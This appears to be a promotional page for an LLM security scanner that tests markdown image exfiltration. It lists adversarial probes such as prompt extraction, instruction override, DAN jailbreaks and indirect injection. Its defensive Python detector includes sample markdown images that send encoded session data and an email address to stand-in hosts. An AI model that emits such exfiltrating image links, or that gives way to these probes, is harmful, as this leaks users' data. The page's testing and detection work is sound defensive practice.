42Crunch for Markdown image exfiltration check

What middleBrick covers

  • 18 adversarial LLM probes across Quick, Standard, and Deep tiers
  • Markdown injection and prompt extraction testing
  • Black-box scanning without agents or SDKs
  • Read-only methods with sensitive data protections
  • Mapping to OWASP API Top 10 (2023), SOC 2 Type II, and PCI-DSS 4.0
  • CLI and web dashboard for scan management and reporting

Scope of markdown injection assessment

middleBrick targets markdown injection as part of LLM security testing. The scanner executes 18 adversarial probes across three tiers: Quick, Standard, and Deep. These probes include system prompt extraction, instruction override, DAN and roleplay jailbreaks, data exfiltration attempts, cost exploitation, encoding bypasses, translation-embedded injection, few-shot poisoning, markdown injection, multi-turn manipulation, indirect prompt injection, token smuggling, tool-abuse patterns, nested instruction injection, and PII extraction.

How the scanner evaluates markdown handling

The scanner submits markdown payloads through URL-accepting parameters and body fields that support markdown rendering. It also uses active IP-bypass probes and internal IP detection to identify SSRF-related risks that can aid exfiltration. Responses are analyzed for unintended content disclosure, such as rendered sensitive data or model behavior deviations that indicate successful injection.
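The response analysis described above can also be run on the defender's side, before model output reaches a markdown renderer. The following is an added example, not middleBrick's code or its detection logic: it flags images in a model response that would make the client request a non-allowlisted host, and lists the query parameter names that could carry data. The allowlist, function names, and sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hosts this application may load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

INLINE_IMG = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)')           # ![alt](url "title")
REF_IMG = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')                 # ![alt][label] or ![alt][]
REF_DEF = re.compile(r'^ {0,3}\[([^\]]+)\]:\s*<?([^\s>]+)', re.M)  # [label]: url
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def image_urls(text):
    """Collect image URLs from inline, reference-style and raw HTML syntax."""
    defs = {label.lower(): url for label, url in REF_DEF.findall(text)}
    urls = INLINE_IMG.findall(text) + HTML_IMG.findall(text)
    for alt, label in REF_IMG.findall(text):
        url = defs.get((label or alt).lower())  # empty label falls back to alt text
        if url:
            urls.append(url)
    return urls

def find_image_exfil(text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return images that would make the client contact a non-allowlisted host."""
    findings = []
    for url in image_urls(text):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:
            # Unparsable URL: report it rather than silently trusting it.
            findings.append({"url": url, "host": None, "params": []})
            continue
        if not host or host in allowed_hosts:
            continue  # relative, data: or allowlisted URL: no third-party request
        findings.append({"url": url, "host": host,
                         "params": [k for k, _ in parse_qsl(parts.query)]})
    return findings

# Constructed model response for illustration, not captured output.
SAMPLE = (
    "Here is your summary.\n"
    "![logo](https://cdn.example.com/logo.png)\n"
    "![status](https://collector.invalid/p.png?d=c2Vzc2lvbj1hYmM)\n"
    "![chart][c1]\n\n"
    "[c1]: //metrics.invalid/c.gif?u=alice%40example.com\n"
    '<img src="/static/local.png">\n'
)

if __name__ == "__main__":
    for finding in find_image_exfil(SAMPLE):
        print(finding)
```

A response with findings can be blocked, or rendered with its images stripped. The same allowlist belongs in the page's Content-Security-Policy `img-src` directive so the browser enforces it as well.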

Mapping to security frameworks

Findings from markdown injection tests map directly to OWASP API Top 10 (2023). The scanner surfaces inputs where markdown processing leads to injection, privilege escalation, or data exposure, and it aligns with security controls described in SOC 2 Type II and PCI-DSS 4.0. Detected issues include improper input validation and unsafe handling of user-supplied content that can lead to unintended system instructions or data leakage.

Integration and operational considerations

middleBrick operates as a black-box scanner without agents or SDKs. Provide the target URL and, if required, authentication via Bearer, API key, Basic auth, or cookie. The domain verification gate ensures only the domain owner can scan with credentials. Header allowlist limits forwarded headers to Authorization, X-API-Key, Cookie, and X-Custom-* to reduce noise.

Scan duration is under one minute. The CLI command for this assessment is:

middlebrick scan <url>

Use JSON output for integration with existing tooling. The scanner does not fix or patch; it reports findings with remediation guidance and a risk score from A to F.

Limitations and complementary testing

middleBrick does not perform active SQL injection or command injection tests, as those require intrusive payloads outside the stated scope. It does not detect business logic vulnerabilities, blind SSRF, or advanced multi-stage exfiltration paths that rely on out-of-band infrastructure. The tool does not replace a human pentester for high-stakes audits, especially when markdown injection intersects with sensitive data handling or complex application workflows.

Frequently Asked Questions

Which markdown injection techniques does the scanner test?
The scanner runs 18 adversarial probes including system prompt extraction, instruction override, DAN jailbreaks, data exfiltration, encoding bypasses, and multi-turn manipulation focused on markdown processing.

Can authenticated scanning be used for markdown injection checks?
Yes, authenticated scanning is supported with Bearer, API key, Basic auth, and cookies. Domain verification is required to ensure scans are performed by the domain owner.

Does the scanner provide compliance mappings for markdown injection findings?
Findings map to OWASP API Top 10 (2023) and support audit evidence for SOC 2 Type II and PCI-DSS 4.0. The tool does not claim compliance with any regulatory framework.

What happens after a markdown injection finding is reported?
The scanner provides a risk score and prioritized findings with remediation guidance. It does not automatically patch or block; developers must apply fixes based on the reported context.